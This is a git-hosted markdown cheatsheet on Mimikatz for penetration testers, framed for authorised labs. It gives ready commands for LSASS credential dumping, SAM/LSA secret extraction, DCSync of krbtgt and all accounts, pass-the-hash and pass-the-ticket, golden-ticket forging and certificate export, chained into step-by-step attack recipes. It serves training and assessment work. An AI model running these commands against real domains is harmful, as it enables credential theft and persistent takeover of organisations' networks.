daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

mimikatz.md (4913B)


      1 ---
      2 title: "Mimikatz"
      3 description: "Mimikatz credential extraction: sekurlsa, LSA dumps, DCSync, pass-the-hash/ticket, golden/silver tickets."
      4 category: active-directory
      5 subcategory: "Tooling & Recon"
      6 tags: [active-directory, credentials, kerberos]
      7 tools: [Mimikatz]
      8 difficulty: intermediate
      9 updated: "2026-08-09"
     10 source: "vault:Tools/Mimikatz-Cheatsheet.md"
     11 ---
     12 
     13 # Mimikatz
     14 
     15 > **Context —** HTB / CPTS / authorised AD labs. Tool: Mimikatz (module reference).
     16 
     17 Windows credential / Kerberos post-exploitation reference for authorised assessments. Commands track the upstream README and wiki. Prefer modern alternatives (`nxc … --sam/--lsa`, `secretsdump`, Rubeus) when EDR blocks Mimikatz — still learn the module language for older labs and reports.
     18 
     19 Related notes: Rubeus, Impacket, NetExec, Hashcat, Certipy, Cobalt Strike.
     20 
     21 ## Summary
     22 
     23 Mimikatz reads Windows secrets from LSASS, SAM/LSA, and Kerberos, and can perform PtH/PtT and ticket forging. On modern hosts expect Credential Guard, LSA protection, and EDR to block naive runs. Use only with authorisation; treat dumps as highly sensitive evidence.
     24 
     25 > **Danger — Authorised-use framing**
     26 > 1. Requires appropriate privileges (often high integrity + `SeDebugPrivilege`).
     27 > 2. LSASS access is loudly monitored — prefer lab-safe methods when possible.
     28 > 3. Never run against production without explicit ROE.
     29 
     30 ## Session Hygiene
     31 
     32 ```text
     33 mimikatz # log
     34 mimikatz # privilege::debug
     35 mimikatz # token::elevate          # when needed
     36 mimikatz # version
     37 ```
     38 
     39 > **Important — Prerequisites**
     40 > 1. `privilege::debug` should return OK before `sekurlsa::*`.
     41 > 2. `log` writes a transcript — useful for reports.
     42 > 3. Architecture must match (x64 mimikatz on x64 Windows).
     43 
     44 ## sekurlsa (LSASS)
     45 
     46 ```text
     47 sekurlsa::logonpasswords
     48 sekurlsa::tickets /export
     49 sekurlsa::ekeys
     50 sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:NTHASH /run:cmd.exe
     51 ```
     52 
     53 > **Module breakdown**
     54 > 1. **logonpasswords**: MSV / TSPKG / WDigest / Kerberos material from logon sessions.
     55 > 2. **tickets /export**: `.kirbi` files for Rubeus `ptt` or Mimikatz `kerberos::ptt`.
     56 > 3. **pth**: spawn a process with alternate NTLM credentials (PTH).
     57 > 4. WDigest cleartext appears only if WDigest is enabled (legacy configs).
     58 
     59 ## lsadump / DCSync
     60 
     61 ```text
     62 lsadump::sam
     63 lsadump::secrets
     64 lsadump::lsa /patch
     65 lsadump::dcsync /domain:DOMAIN.LOCAL /user:krbtgt
     66 lsadump::dcsync /domain:DOMAIN.LOCAL /user:Administrator
     67 lsadump::dcsync /domain:DOMAIN.LOCAL /all /csv
     68 ```
     69 
     70 > **Warning — DCSync rights**
     71 > 1. Needs replication rights (e.g. Domain Admins / equivalent ACLs) — map with BloodHound.
     72 > 2. Prefer Impacket `secretsdump.py -just-dc-user` from Linux when you already have creds.
     73 > 3. `/user:krbtgt` enables golden-ticket tradecraft — document carefully.
     74 
     75 ## kerberos
     76 
     77 ```text
     78 kerberos::list /export
     79 kerberos::ptt c:\temp\ticket.kirbi
     80 kerberos::purge
     81 kerberos::golden /user:Administrator /domain:domain.local \
     82   /sid:S-1-5-21-... /krbtgt:KRBTGT_NT_HASH /ptt
     83 ```
     84 
     85 > **Tip —** Harvest/monitor/roast flows are often cleaner in Rubeus, but Mimikatz remains ubiquitous in writeups and older lab guides.
     86 
     87 ## crypto / vault
     88 
     89 ```text
     90 crypto::capi
     91 crypto::cng
     92 crypto::certificates /export
     93 crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
     94 crypto::keys /export
     95 vault::cred
     96 vault::list
     97 ```
     98 
     99 ## Practical Recipes
    100 
    101 ```text
    102 # A) Local admin → LSASS → PTH
    103 privilege::debug
    104 sekurlsa::logonpasswords
    105 sekurlsa::pth /user:Administrator /domain:CORP /ntlm:fc525c96... /run:powershell.exe
    106 
    107 # B) DA → DCSync krbtgt → golden
    108 lsadump::dcsync /domain:corp.local /user:krbtgt
    109 kerberos::golden /user:EvilAdmin /domain:corp.local /sid:S-1-5-21-... \
    110   /krbtgt:HASH /ptt
    111 
    112 # C) Export tickets for offline reuse
    113 sekurlsa::tickets /export
    114 ```
    115 
    116 ## Troubleshooting & Gotchas
    117 
    118 > **Common failures**
    119 > 1. **Privilege '20' KO**: not elevated / PPL blocking — try accepted lab bypasses only inside ROE.
    120 > 2. **Empty passwords**: Credential Guard / no WDigest — collect NT hashes or tickets instead.
    121 > 3. **AV deleted binary**: sideload from approved C2 toolkit or use non-Mimikatz dumpers in that lab.
    122 
    123 ## Lessons Learned
    124 
    125 1. `privilege::debug` + matching arch before anything else.
    126 2. Export tickets early; sessions disappear on logoff.
    127 3. DCSync > interactive LSASS on DCs when you already have replication rights.
    128 4. Cross-tool fluency (Mimikatz ↔ Rubeus ↔ Impacket) matters more than one binary.
    129 5. Treat outputs as credential inventory for the report, not a souvenir stash.
    130 
    131 ## References
    132 
    133 1. gentilkiwi/mimikatz: https://github.com/gentilkiwi/mimikatz
    134 2. Mimikatz Wiki: https://github.com/gentilkiwi/mimikatz/wiki
    135 3. gentilkiwi blog: https://blog.gentilkiwi.com/mimikatz
    136 4. MITRE ATT&CK — OS Credential Dumping: https://attack.mitre.org/techniques/T1003/
    137 5. HackTricks — Mimikatz: https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz